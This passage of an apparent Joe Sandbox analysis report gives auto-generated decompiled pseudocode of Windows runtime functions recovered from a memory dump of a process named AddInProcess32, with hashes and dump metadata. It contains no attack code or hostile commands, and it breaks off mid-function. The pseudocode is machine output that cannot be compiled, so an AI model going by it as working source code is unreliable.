                              				intOrPtr _t68;
                              				intOrPtr _t72;
                              				intOrPtr _t73;
                              				signed int* _t75;
                              				intOrPtr _t79;
                              				intOrPtr _t80;
                              				char _t82;
                              				signed int _t83;
                              				signed int _t84;
                              				signed int _t88;
                              				signed int _t89;
                              				intOrPtr _t90;
                              				intOrPtr _t92;
                              				signed int _t97;
                              				intOrPtr _t98;
                              				intOrPtr* _t99;
                              				signed int* _t101;
                              				signed int* _t102;
                              				intOrPtr* _t103;
                              				intOrPtr _t105;
                              				signed int _t106;
                              				void* _t118;
                              
                              				_t92 = __edx;
                              				_t75 = _a4;
                              				_t98 = __ecx;
                              				_v44 = __edx;
                              				_t106 = _t75[1];
                              				_v40 = __ecx;
                              				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                              					_t82 = 0;
                              				} else {
                              					_t82 = 1;
                              				}
                              				_v5 = _t82;
                              				_t6 = _t98 + 0xc8; // 0xc9
                              				_t101 = _t6;
                              				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                              				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                              				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                              				if(_t82 != 0) {
                              					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                              					_t83 =  *_t75;
                              					_t54 = _t75[1];
                              					 *_t101 = _t83;
                              					_t84 = _t83 | _t54;
                              					_t101[1] = _t54;
                              					if(_t84 == 0) {
                              						_t101[1] = _t101[1] & _t84;
                              						 *_t101 = 1;
                              					}
                              					goto L19;
                              				} else {
                              					if(_t101 == 0) {
                              						E0185CC50(E01854510(0xc000000d));
                              						_t88 =  *_t101;
                              						_t97 = _t101[1];
                              						L15:
                              						_v12 = _t88;
                              						_t66 = _t88 -  *_t75;
                              						_t89 = _t97;
                              						asm("sbb ecx, [ebx+0x4]");
                              						_t118 = _t89 - _t97;
                              						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                              							_t66 = _t66 | 0xffffffff;
                              							_t89 = 0x7fffffff;
                              						}
                              						 *_t101 = _t66;
                              						_t101[1] = _t89;
                              						L19:
                              						if(E01877D50() != 0) {
                              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              						} else {
                              							_t58 = 0x7ffe0386;
                              						}
                              						_t102 = _v16;
                              						if( *_t58 != 0) {
                              							_t58 = E01928ED6(_t102, _t98);
                              						}
                              						_t76 = _v44;
                              						E01872280(_t58, _v44);
                              						E0187DD82(_v44, _t102, _t98);
                              						E0187B944(_t102, _v5);
                              						return E0186FFB0(_t76, _t98, _t76);
                              					}
                              					_t99 = 0x7ffe03b0;
                              					do {
                              						_t103 = 0x7ffe0010;
                              						do {
                              							_t67 =  *0x1948628; // 0x0
                              							_v28 = _t67;
                              							_t68 =  *0x194862c; // 0x0
                              							_v32 = _t68;
                              							_v24 =  *((intOrPtr*)(_t99 + 4));
                              							_v20 =  *_t99;
                              							while(1) {
                              								_t97 =  *0x7ffe000c;
                              								_t90 =  *0x7FFE0008;
                              								if(_t97 ==  *_t103) {
                              									goto L10;
                              								}
                              								asm("pause");
                              							}
                              							L10:
                              							_t79 = _v24;
                              							_t99 = 0x7ffe03b0;
                              							_v12 =  *0x7ffe03b0;
                              							_t72 =  *0x7FFE03B4;
                              							_t103 = 0x7ffe0010;
                              							_v36 = _t72;
                              						} while (_v20 != _v12 || _t79 != _t72);
                              						_t73 =  *0x1948628; // 0x0
                              						_t105 = _v28;
                              						_t80 =  *0x194862c; // 0x0
                              					} while (_t105 != _t73 || _v32 != _t80);
                              					_t98 = _v40;
                              					asm("sbb edx, [ebp-0x20]");
                              					_t88 = _t90 - _v12 - _t105;
                              					_t75 = _a4;
                              					asm("sbb edx, eax");
                              					_t31 = _t98 + 0xc8; // 0x191fb53
                              					_t101 = _t31;
                              					 *_t101 = _t88;
                              					_t101[1] = _t97;
                              					goto L15;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 29ab8d435f61ccb1982c609e64d472f68f8fb9090f502b6597868ef645707db7
                              • Instruction ID: c08de5945096705bc84458c6e09c1397547815c6f8ca95c84f734eb8e470c59d
                              • Opcode Fuzzy Hash: 29ab8d435f61ccb1982c609e64d472f68f8fb9090f502b6597868ef645707db7
                              • Instruction Fuzzy Hash: 90519D75A01606CFCB14DFACC480AAEBBF5BF98310F24825AD955E7344EB31EA44CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E0186EF40(intOrPtr __ecx) {
                              				char _v5;
                              				char _v6;
                              				char _v7;
                              				char _v8;
                              				signed int _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr _t58;
                              				char _t59;
                              				signed char _t69;
                              				void* _t73;
                              				signed int _t74;
                              				char _t79;
                              				signed char _t81;
                              				signed int _t85;
                              				signed int _t87;
                              				intOrPtr _t90;
                              				signed char* _t91;
                              				void* _t92;
                              				signed int _t94;
                              				void* _t96;
                              
                              				_t90 = __ecx;
                              				_v16 = __ecx;
                              				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                              					_t58 =  *((intOrPtr*)(__ecx));
                              					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                              						E01859080(_t73, __ecx, __ecx, _t92);
                              					}
                              				}
                              				_t74 = 0;
                              				_t96 =  *0x7ffe036a - 1;
                              				_v12 = 0;
                              				_v7 = 0;
                              				if(_t96 > 0) {
                              					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                              					_v12 = _t74;
                              					_v7 = _t96 != 0;
                              				}
                              				_t79 = 0;
                              				_v8 = 0;
                              				_v5 = 0;
                              				while(1) {
                              					L4:
                              					_t59 = 1;
                              					L5:
                              					while(1) {
                              						if(_t59 == 0) {
                              							L12:
                              							_t21 = _t90 + 4; // 0x7788c21e
                              							_t87 =  *_t21;
                              							_v6 = 0;
                              							if(_t79 != 0) {
                              								if((_t87 & 0x00000002) != 0) {
                              									goto L19;
                              								}
                              								if((_t87 & 0x00000001) != 0) {
                              									_v6 = 1;
                              									_t74 = _t87 ^ 0x00000003;
                              								} else {
                              									_t51 = _t87 - 2; // -2
                              									_t74 = _t51;
                              								}
                              								goto L15;
                              							} else {
                              								if((_t87 & 0x00000001) != 0) {
                              									_v6 = 1;
                              									_t74 = _t87 ^ 0x00000001;
                              								} else {
                              									_t26 = _t87 - 4; // -4
                              									_t74 = _t26;
                              									if((_t74 & 0x00000002) == 0) {
                              										_t74 = _t74 - 2;
                              									}
                              								}
                              								L15:
                              								if(_t74 == _t87) {
                              									L19:
                              									E01852D8A(_t74, _t90, _t87, _t90);
                              									_t74 = _v12;
                              									_v8 = 1;
                              									if(_v7 != 0 && _t74 > 0x64) {
                              										_t74 = _t74 - 1;
                              										_v12 = _t74;
                              									}
                              									_t79 = _v5;
                              									goto L4;
                              								}
                              								asm("lock cmpxchg [esi], ecx");
                              								if(_t87 != _t87) {
                              									_t74 = _v12;
                              									_t59 = 0;
                              									_t79 = _v5;
                              									continue;
                              								}
                              								if(_v6 != 0) {
                              									_t74 = _v12;
                              									L25:
                              									if(_v7 != 0) {
                              										if(_t74 < 0x7d0) {
                              											if(_v8 == 0) {
                              												_t74 = _t74 + 1;
                              											}
                              										}
                              										_t38 = _t90 + 0x14; // 0x0
                              										_t39 = _t90 + 0x14; // 0x0
                              										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                              										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                              											_t85 = _t85 & 0xff000000;
                              										}
                              										 *(_t90 + 0x14) = _t85;
                              									}
                              									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                              									 *((intOrPtr*)(_t90 + 8)) = 1;
                              									return 0;
                              								}
                              								_v5 = 1;
                              								_t87 = _t74;
                              								goto L19;
                              							}
                              						}
                              						_t94 = _t74;
                              						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                              						if(_t74 == 0) {
                              							goto L12;
                              						} else {
                              							_t91 = _t90 + 4;
                              							goto L8;
                              							L9:
                              							while((_t81 & 0x00000001) != 0) {
                              								_t69 = _t81;
                              								asm("lock cmpxchg [edi], edx");
                              								if(_t69 != _t81) {
                              									_t81 = _t69;
                              									continue;
                              								}
                              								_t90 = _v16;
                              								goto L25;
                              							}
                              							asm("pause");
                              							_t94 = _t94 - 1;
                              							if(_t94 != 0) {
                              								L8:
                              								_t81 =  *_t91;
                              								goto L9;
                              							} else {
                              								_t90 = _v16;
                              								_t79 = _v5;
                              								goto L12;
                              							}
                              						}
                              					}
                              				}
                              			}
                              0x0186efb2
                              0x0186f036
                              0x0186f03a
                              0x0186f040
                              0x0186f090
                              0x00000000
                              0x0186f092
                              0x0186f042
                              0x00000000
                              0x0186f042
                              0x0186efb7
                              0x0186efb9
                              0x0186efbc
                              0x0186efb0
                              0x0186efb0
                              0x00000000
                              0x0186efbe
                              0x0186efbe
                              0x0186efc1
                              0x00000000
                              0x0186efc1
                              0x0186efbc
                              0x0186efaa
                              0x0186ef91

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                              • Instruction ID: 43810c4f983c83b6c15ef4f2de83d72bee0b06ae362d9d4b07e5955249a23355
                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                              • Instruction Fuzzy Hash: 35510634E04249EFDB25CB6CD1D07EEBBB5AF05318F1481A8D645D7282C375AB89C742
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 84%
                              			E0192740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                              				signed short* _v8;
                              				intOrPtr _v12;
                              				intOrPtr _t55;
                              				void* _t56;
                              				intOrPtr* _t66;
                              				intOrPtr* _t69;
                              				void* _t74;
                              				intOrPtr* _t78;
                              				intOrPtr* _t81;
                              				intOrPtr* _t82;
                              				intOrPtr _t83;
                              				signed short* _t84;
                              				intOrPtr _t85;
                              				signed int _t87;
                              				intOrPtr* _t90;
                              				intOrPtr* _t93;
                              				intOrPtr* _t94;
                              				void* _t98;
                              
                              				_t84 = __edx;
                              				_t80 = __ecx;
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t55 = __ecx;
                              				_v8 = __edx;
                              				_t87 =  *__edx & 0x0000ffff;
                              				_v12 = __ecx;
                              				_t3 = _t55 + 0x154; // 0x154
                              				_t93 = _t3;
                              				_t78 =  *_t93;
                              				_t4 = _t87 + 2; // 0x2
                              				_t56 = _t4;
                              				while(_t78 != _t93) {
                              					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                              						L4:
                              						_t78 =  *_t78;
                              						continue;
                              					} else {
                              						_t7 = _t78 + 0x18; // 0x18
                              						if(E018AD4F0(_t7, _t84[2], _t87) == _t87) {
                              							_t40 = _t78 + 0xc; // 0xc
                              							_t94 = _t40;
                              							_t90 =  *_t94;
                              							while(_t90 != _t94) {
                              								_t41 = _t90 + 8; // 0x8
                              								_t74 = E0189F380(_a4, _t41, 0x10);
                              								_t98 = _t98 + 0xc;
                              								if(_t74 != 0) {
                              									_t90 =  *_t90;
                              									continue;
                              								}
                              								goto L12;
                              							}
                              							_t82 = L01874620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                              							if(_t82 != 0) {
                              								_t46 = _t78 + 0xc; // 0xc
                              								_t69 = _t46;
                              								asm("movsd");
                              								asm("movsd");
                              								asm("movsd");
                              								asm("movsd");
                              								_t85 =  *_t69;
                              								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                              									L20:
                              									_t82 = 3;
                              									asm("int 0x29");
                              								}
                              								 *((intOrPtr*)(_t82 + 4)) = _t69;
                              								 *_t82 = _t85;
                              								 *((intOrPtr*)(_t85 + 4)) = _t82;
                              								 *_t69 = _t82;
                              								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                              								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                              								goto L11;
                              							} else {
                              								L18:
                              								_push(0xe);
                              								_pop(0);
                              							}
                              						} else {
                              							_t84 = _v8;
                              							_t9 = _t87 + 2; // 0x2
                              							_t56 = _t9;
                              							goto L4;
                              						}
                              					}
                              					L12:
                              					return 0;
                              				}
                              				_t10 = _t87 + 0x1a; // 0x1a
                              				_t78 = L01874620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                              				if(_t78 == 0) {
                              					goto L18;
                              				} else {
                              					_t12 = _t87 + 2; // 0x2
                              					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                              					_t16 = _t78 + 0x18; // 0x18
                              					E0189F3E0(_t16, _v8[2], _t87);
                              					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                              					_t19 = _t78 + 0xc; // 0xc
                              					_t66 = _t19;
                              					 *((intOrPtr*)(_t66 + 4)) = _t66;
                              					 *_t66 = _t66;
                              					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                              					_t81 = L01874620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                              					if(_t81 == 0) {
                              						goto L18;
                              					} else {
                              						_t26 = _t78 + 0xc; // 0xc
                              						_t69 = _t26;
                              						asm("movsd");
                              						asm("movsd");
                              						asm("movsd");
                              						asm("movsd");
                              						_t85 =  *_t69;
                              						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                              							goto L20;
                              						} else {
                              							 *((intOrPtr*)(_t81 + 4)) = _t69;
                              							 *_t81 = _t85;
                              							 *((intOrPtr*)(_t85 + 4)) = _t81;
                              							 *_t69 = _t81;
                              							_t83 = _v12;
                              							 *(_t78 + 8) = 1;
                              							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                              							_t34 = _t83 + 0x154; // 0x1ba
                              							_t69 = _t34;
                              							_t85 =  *_t69;
                              							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                              								goto L20;
                              							} else {
                              								 *_t78 = _t85;
                              								 *((intOrPtr*)(_t78 + 4)) = _t69;
                              								 *((intOrPtr*)(_t85 + 4)) = _t78;
                              								 *_t69 = _t78;
                              								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                              							}
                              						}
                              						goto L11;
                              					}
                              				}
                              				goto L12;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                              • Instruction ID: 926098a57fa0ddbe6571b2e1afd6afe85192e4a15abf52e6bb9f59223e5bf1a6
                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                              • Instruction Fuzzy Hash: BF517D71600646EFDB1ACF58C480E56FBB9FF55305F1481AAE908EF216E371EA85CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 97%
                              			E01882990() {
                              				signed int* _t62;
                              				signed int _t64;
                              				intOrPtr _t66;
                              				signed short* _t69;
                              				intOrPtr _t76;
                              				signed short* _t79;
                              				void* _t81;
                              				signed int _t82;
                              				signed short* _t83;
                              				signed int _t87;
                              				intOrPtr _t91;
                              				void* _t98;
                              				signed int _t99;
                              				void* _t101;
                              				signed int* _t102;
                              				void* _t103;
                              				void* _t104;
                              				void* _t107;
                              
                              				_push(0x20);
                              				_push(0x192ff00);
                              				E018AD08C(_t81, _t98, _t101);
                              				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                              				_t99 = 0;
                              				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                              				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                              				if(_t82 == 0) {
                              					_t62 = 0xc0000100;
                              				} else {
                              					 *((intOrPtr*)(_t103 - 4)) = 0;
                              					_t102 = 0xc0000100;
                              					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                              					_t64 = 4;
                              					while(1) {
                              						 *(_t103 - 0x24) = _t64;
                              						if(_t64 == 0) {
                              							break;
                              						}
                              						_t87 = _t64 * 0xc;
                              						 *(_t103 - 0x2c) = _t87;
                              						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1831664));
                              						if(_t107 <= 0) {
                              							if(_t107 == 0) {
                              								_t79 = E0189E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1831668)), _t82);
                              								_t104 = _t104 + 0xc;
                              								__eflags = _t79;
                              								if(__eflags == 0) {
                              									_t102 = E018D51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x183166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                              									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                              									break;
                              								} else {
                              									_t64 =  *(_t103 - 0x24);
                              									goto L5;
                              								}
                              								goto L13;
                              							} else {
                              								L5:
                              								_t64 = _t64 - 1;
                              								continue;
                              							}
                              						}
                              						break;
                              					}
                              					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                              					__eflags = _t102;
                              					if(_t102 < 0) {
                              						__eflags = _t102 - 0xc0000100;
                              						if(_t102 == 0xc0000100) {
                              							_t83 =  *((intOrPtr*)(_t103 + 8));
                              							__eflags = _t83;
                              							if(_t83 != 0) {
                              								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                              								__eflags =  *_t83 - _t99;
                              								if( *_t83 == _t99) {
                              									_t102 = 0xc0000100;
                              									goto L19;
                              								} else {
                              									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                              									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                              									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                              									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                              										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                              										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                              											L26:
                              											_t102 = E01882AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                              											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                              											__eflags = _t102 - 0xc0000100;
                              											if(_t102 != 0xc0000100) {
                              												goto L12;
                              											} else {
                              												_t99 = 1;
                              												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                              												goto L18;
                              											}
                              										} else {
                              											_t69 = E01866600( *((intOrPtr*)(_t91 + 0x1c)));
                              											__eflags = _t69;
                              											if(_t69 != 0) {
                              												goto L26;
                              											} else {
                              												_t83 =  *((intOrPtr*)(_t103 + 8));
                              												goto L18;
                              											}
                              										}
                              									} else {
                              										L18:
                              										_t102 = E01882C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                              										L19:
                              										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                              										goto L12;
                              									}
                              								}
                              								L28:
                              							} else {
                              								E0186EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              								 *((intOrPtr*)(_t103 - 4)) = 1;
                              								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                              								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                              								_t76 = E01882AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                              								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                              								__eflags = _t76 - 0xc0000100;
                              								if(_t76 == 0xc0000100) {
                              									 *((intOrPtr*)(_t103 - 0x1c)) = E01882C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                              								}
                              								 *((intOrPtr*)(_t103 - 4)) = _t99;
                              								E01882ACB();
                              							}
                              						}
                              					}
                              					L12:
                              					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                              					_t62 = _t102;
                              				}
                              				L13:
                              				return E018AD0D1(_t62);
                              				goto L28;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e3e07334674dbcac41cd3989b45a7e1a4834a798c89549088a6c7fc853351ed7
                              • Instruction ID: 90934820ffe028aca41114c25bc58ee0488c0487e1d2178084adade37c6d02f6
                              • Opcode Fuzzy Hash: e3e07334674dbcac41cd3989b45a7e1a4834a798c89549088a6c7fc853351ed7
                              • Instruction Fuzzy Hash: CD516A71A0020ADFDF25EF99C880ADEBBB6BF58714F048119E915EB210D335DA52CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E01884BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                              				signed int _v8;
                              				short _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				char _v36;
                              				char _v156;
                              				short _v158;
                              				intOrPtr _v160;
                              				char _v164;
                              				intOrPtr _v168;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t45;
                              				intOrPtr _t74;
                              				signed char _t77;
                              				intOrPtr _t84;
                              				char* _t85;
                              				void* _t86;
                              				intOrPtr _t87;
                              				signed short _t88;
                              				signed int _t89;
                              
                              				_t83 = __edx;
                              				_v8 =  *0x194d360 ^ _t89;
                              				_t45 = _a8 & 0x0000ffff;
                              				_v158 = __edx;
                              				_v168 = __ecx;
                              				if(_t45 == 0) {
                              					L22:
                              					_t86 = 6;
                              					L12:
                              					E0185CC50(_t86);
                              					L11:
                              					return E0189B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                              				}
                              				_t77 = _a4;
                              				if((_t77 & 0x00000001) != 0) {
                              					goto L22;
                              				}
                              				_t8 = _t77 + 0x34; // 0xdce0ba00
                              				if(_t45 !=  *_t8) {
                              					goto L22;
                              				}
                              				_t9 = _t77 + 0x24; // 0x1948504
                              				E01872280(_t9, _t9);
                              				_t87 = 0x78;
                              				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                              				E0189FA60( &_v156, 0, _t87);
                              				_t13 = _t77 + 0x30; // 0x3db8
                              				_t85 =  &_v156;
                              				_v36 =  *_t13;
                              				_v28 = _v168;
                              				_v32 = 0;
                              				_v24 = 0;
                              				_v20 = _v158;
                              				_v160 = 0;
                              				while(1) {
                              					_push( &_v164);
                              					_push(_t87);
                              					_push(_t85);
                              					_push(0x18);
                              					_push( &_v36);
                              					_push(0x1e);
                              					_t88 = E0189B0B0();
                              					if(_t88 != 0xc0000023) {
                              						break;
                              					}
                              					if(_t85 !=  &_v156) {
                              						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                              					}
                              					_t84 = L01874620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                              					_v168 = _v164;
                              					if(_t84 == 0) {
                              						_t88 = 0xc0000017;
                              						goto L19;
                              					} else {
                              						_t74 = _v160 + 1;
                              						_v160 = _t74;
                              						if(_t74 >= 0x10) {
                              							L19:
                              							_t86 = E0185CCC0(_t88);
                              							if(_t86 != 0) {
                              								L8:
                              								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                              								_t30 = _t77 + 0x24; // 0x1948504
                              								E0186FFB0(_t77, _t84, _t30);
                              								if(_t84 != 0 && _t84 !=  &_v156) {
                              									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                              								}
                              								if(_t86 != 0) {
                              									goto L12;
                              								} else {
                              									goto L11;
                              								}
                              							}
                              							L6:
                              							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                              							if(_v164 != 0) {
                              								_t83 = _t84;
                              								E01884F49(_t77, _t84);
                              							}
                              							goto L8;
                              						}
                              						_t87 = _v168;
                              						continue;
                              					}
                              				}
                              				if(_t88 != 0) {
                              					goto L19;
                              				}
                              				goto L6;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a4088141dca32b6a7231275e7f0585e4e6870f0cd6a9eea68ab87c16f4c1a3dc
                              • Instruction ID: 1f108626a4c7a5e0d71082bfc5e9de8f9530c01ae0ee79a9cf1a24d0eebf8693
                              • Opcode Fuzzy Hash: a4088141dca32b6a7231275e7f0585e4e6870f0cd6a9eea68ab87c16f4c1a3dc
                              • Instruction Fuzzy Hash: 5F419736A002199BDB21EF68C940BE977B9EF45710F1105A9E908EB341E774DF45CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
                              			E01884D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				signed int _v12;
                              				char _v176;
                              				char _v177;
                              				char _v184;
                              				intOrPtr _v192;
                              				intOrPtr _v196;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed short _t42;
                              				char* _t44;
                              				intOrPtr _t46;
                              				intOrPtr _t50;
                              				char* _t57;
                              				intOrPtr _t59;
                              				intOrPtr _t67;
                              				signed int _t69;
                              
                              				_t64 = __edx;
                              				_v12 =  *0x194d360 ^ _t69;
                              				_t65 = 0xa0;
                              				_v196 = __edx;
                              				_v177 = 0;
                              				_t67 = __ecx;
                              				_v192 = __ecx;
                              				E0189FA60( &_v176, 0, 0xa0);
                              				_t57 =  &_v176;
                              				_t59 = 0xa0;
                              				if( *0x1947bc8 != 0) {
                              					L3:
                              					while(1) {
                              						asm("movsd");
                              						asm("movsd");
                              						asm("movsd");
                              						asm("movsd");
                              						_t67 = _v192;
                              						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                              						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                              						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                              						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                              						_push( &_v184);
                              						_push(_t59);
                              						_push(_t57);
                              						_push(0xa0);
                              						_push(_t57);
                              						_push(0xf);
                              						_t42 = E0189B0B0();
                              						if(_t42 != 0xc0000023) {
                              							break;
                              						}
                              						if(_v177 != 0) {
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                              						}
                              						_v177 = 1;
                              						_t44 = L01874620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                              						_t59 = _v184;
                              						_t57 = _t44;
                              						if(_t57 != 0) {
                              							continue;
                              						} else {
                              							_t42 = 0xc0000017;
                              							break;
                              						}
                              					}
                              					if(_t42 != 0) {
                              						_t65 = E0185CCC0(_t42);
                              						if(_t65 != 0) {
                              							L10:
                              							if(_v177 != 0) {
